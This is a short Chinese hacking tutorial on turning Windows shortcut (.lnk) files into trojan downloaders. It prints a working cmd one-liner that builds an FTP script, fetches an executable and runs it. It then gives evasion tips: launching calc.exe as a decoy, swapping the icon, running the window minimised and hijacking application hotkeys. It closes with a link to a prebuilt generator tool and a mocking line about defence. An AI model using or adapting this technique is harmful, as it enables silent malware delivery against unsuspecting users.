之前看到一款俄罗斯黑阔写的的快捷方式下载木马并运行的生成工具(Shortcut Downloader),调用PowerShell创建快捷方式实现下载恶意文件并运行,要知道PowerShell在03之前是没有默认安装的,也就是说在默认未装载的PC上就然并卵了。
快捷方式木马并非神马新鲜玩意,但大多集中于流氓网页,正常程序快捷方式遭到恶意文件替换(本来打开的QQ想撩妹,结果弹出苍老师的播放器),如何利用快捷方式(不调用PowerShell的情况下实现)实现下载某个文件并运行呢?聪明的你想到cmd多命令执行了吗?whoami&&netuser??至于下载文件,既然可以cmd多命令执行了,当然可以利用ftp下载文件了,有了思路就动手吧!
基本思路
逻辑
1. Echo写出ftp信息,使用ftp –s:x 参数运行下载命令
2. 语句使用&&链接,语句被执行才会继续下一步操作
3. 最后执行恶意程序时使用if exist判断恶意程序是否下载,如果下载则执行
思路验证
echo open127.0.0.1>f&&echo 123>>f&&echo321>>f&&echo get 2.exe>>f&&echobye>>f&&ftp -s:f&&del /q f&&if exist 2.exe start2.exe
CMD下运行正常,但写到快捷方式,显然需要修改一下,首先必须加入/c执行,否则会卡出黑屏不退出(这么不尊重被攻击者,脑子是不是被踢了),在下载前运行一个正常的程序,免的被发现,例如calc.exe&&下载运行命令,然后你总得更改下图标吧大哥,其次既然是在后台静默下载运行,我们当然不想快捷方式一闪而过,创建完快捷方式右键修改运行方式最小化,OK一个简单lnk下载者就成了。
奇技淫巧
如果你右键查看,细心的朋友已经注意到有一个快捷键的选项,快捷方式的快捷方式,他是个无公害的功能,如果被恶意替换冲突某些程序的快捷方式呢?例如QQ的Ctrl+Alt+A截屏快捷键,毕竟是失传已久的“隔空怀孕”,难免有射不准的时候,多测试几次找找规律!
自动工具
每次创建都尼玛要写一长串cmd命令,就算不烦也难免写出的时候啊,结合上面的实验写了一个小工具,纯属方便用的,附上小工具:LnkDown.exe
链接: https://pan.baidu.com/s/1mie0mko 密码: 5dxi
防御:远离黑客,珍爱生命!